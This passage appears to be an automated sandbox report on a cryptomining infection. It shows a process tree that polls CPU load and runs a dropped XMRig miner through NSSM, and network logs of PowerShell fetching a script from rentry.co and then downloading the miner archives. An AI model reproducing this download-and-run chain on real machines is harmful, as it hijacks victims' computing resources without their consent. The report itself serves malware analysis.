- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1648
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1580
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4708
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3708
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4260
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3312
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3908
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3256
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1488
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3204
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3692
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2316
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5084
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2444
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4564,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=4216 /prefetch:8
1⤵
PID:4744

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:2300
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1736,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=1432 /prefetch:8
1⤵
PID:4448

Network

DNS

196.249.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.249.167.52.in-addr.arpa

IN PTR

Response
DNS

rentry.co

powershell.exe

Remote address:

8.8.8.8:53

Request

rentry.co

IN A

Response

rentry.co

IN A

172.67.75.40

rentry.co

IN A

104.26.3.16

rentry.co

IN A

104.26.2.16
GET

https://rentry.co/regele/raw

powershell.exe

Remote address:

172.67.75.40:443

Request

GET /regele/raw HTTP/1.1
Host: rentry.co
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 28 Jun 2024 23:34:08 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 14923
Connection: keep-alive
vary: Origin
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
Cache-Control: Vary
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z63SIQguYRmB6srt%2FxEM%2BGm1ijkGAtKEHZB9jJZ5Yr8ud3FZJ1wO9HwR5E%2FS7mlSgpXTRPgM4doeYMD1mVBB8%2FwJZL%2B2cgup4WlyR0giI%2B1OwVaFZJ%2B2H5IByw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 89b17c60ade2414c-LHR
DNS

40.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.75.67.172.in-addr.arpa

IN PTR

Response
DNS

140.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

140.32.126.40.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

powershell.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /MoneroOcean/xmrig_setup/master/xmrig.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 3692486
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "cb4b18ad6d29e2eb894ed10da4876ab80201079a5b7383bfad9a7a24ee01822e"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BBB2:1DA716:38AA3E:41A9E5:667F11F2
Accept-Ranges: bytes
Date: Fri, 28 Jun 2024 23:34:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600037-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1719617650.335493,VS0,VE5
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 0105174fa27eac124404b0951db0c9398628a4e5
Expires: Fri, 28 Jun 2024 23:39:10 GMT
Source-Age: 277
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

13.107.21.237

dual-a-0034.a-msedge.net

IN A

204.79.197.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=16E8DAB8D698698C2556CE14D7BF6841; domain=.bing.com; expires=Wed, 23-Jul-2025 23:34:11 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 66301EDFAB0B49FCAACCCE51EB98C114 Ref B: LON04EDGE0709 Ref C: 2024-06-28T23:34:11Z
date: Fri, 28 Jun 2024 23:34:11 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8ngJn8OhNw7dstVmY8-M37zVUCUydmbmYipy1sQEiynOR_EncIXG3rnrst7D2z1Sg5Jwf16EaCf6229A7TK_macPdnHK7R15Bz2c8jmPlmzVCw52oX5cDgywL2BfpTYg_umDMRhWqJtpYidIkGydZO4ilTNUEYwWlIPjRJBOQrcadnKyR%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D95ab6cafbb551c3a17610ac76e777707&TIME=20240611T225302Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640&muid=8CE4F47C62C1CBA160834AA98427395E HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=16E8DAB8D698698C2556CE14D7BF6841; _EDGE_S=SID=3C57B0EA6F17638908F3A4466E1162B6

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=wBCW_Q9GVKSCgPlbTAm3t-7I6q8wmXrOkyDaE7ZOvRk; domain=.bing.com; expires=Wed, 23-Jul-2025 23:34:12 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 83DA5565B22D49909DFEEBC6E6A7EC5A Ref B: LON04EDGE0709 Ref C: 2024-06-28T23:34:12Z
date: Fri, 28 Jun 2024 23:34:12 GMT
GET

https://www.bing.com/aes/c.gif?RG=e9d4a8df801741d29d7bc7d387147b7c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T225302Z&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640

Remote address:

23.62.61.194:443

Request

GET /aes/c.gif?RG=e9d4a8df801741d29d7bc7d387147b7c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T225302Z&adUnitId=11730597&localId=w:8CE4F47C-62C1-CBA1-6083-4AA98427395E&deviceId=6825835407638640 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=16E8DAB8D698698C2556CE14D7BF6841

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0D667791391F42E1BA1012C171C2E483 Ref B: LON212050702031 Ref C: 2024-06-28T23:34:12Z
content-length: 0
date: Fri, 28 Jun 2024 23:34:12 GMT
set-cookie: _EDGE_S=SID=3C57B0EA6F17638908F3A4466E1162B6; path=/; httponly; domain=bing.com
set-cookie: MUIDB=16E8DAB8D698698C2556CE14D7BF6841; path=/; httponly; expires=Wed, 23-Jul-2025 23:34:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.be3d3e17.1719617652.6dc5137
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
DNS

194.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.61.62.23.in-addr.arpa

IN PTR

Response

194.61.62.23.in-addr.arpa

IN PTR

a23-62-61-194deploystaticakamaitechnologiescom
GET

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

powershell.exe

Remote address:

185.199.110.133:443

Request

GET /MoneroOcean/xmrig_setup/master/nssm.zip HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 138273
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/zip
ETag: "516060408d755298a7c2d5a55ef8816a492c342ce156e91f5893df4d25424a91"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 47A6:1D77D7:3A9E72:439E70:667F11F6
Accept-Ranges: bytes
Date: Fri, 28 Jun 2024 23:34:15 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600041-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1719617655.003547,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f0b8f9d8b4b8ee70bbe37fb3db5592cba11b7e72
Expires: Fri, 28 Jun 2024 23:39:15 GMT
Source-Age: 24
DNS

183.142.211.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.142.211.20.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

145.83.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

145.83.221.88.in-addr.arpa

IN PTR

Response

145.83.221.88.in-addr.arpa

IN PTR

a88-221-83-145deploystaticakamaitechnologiescom
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.28.10

ax-0001.ax-msedge.net

IN A

150.171.27.10
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370639703_1XZVEAKL3PD7EZGL4&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370639703_1XZVEAKL3PD7EZGL4&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 637660
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F0A95AE4DF6441DC89C86C055F196E46 Ref B: LON04EDGE0918 Ref C: 2024-06-28T23:37:53Z
date: Fri, 28 Jun 2024 23:37:53 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239370255189_1E7XE0SO5A57SENIS&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

150.171.28.10:443

Request

GET /th?id=OADD2.10239370255189_1E7XE0SO5A57SENIS&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 664406
content-type: image/jpeg
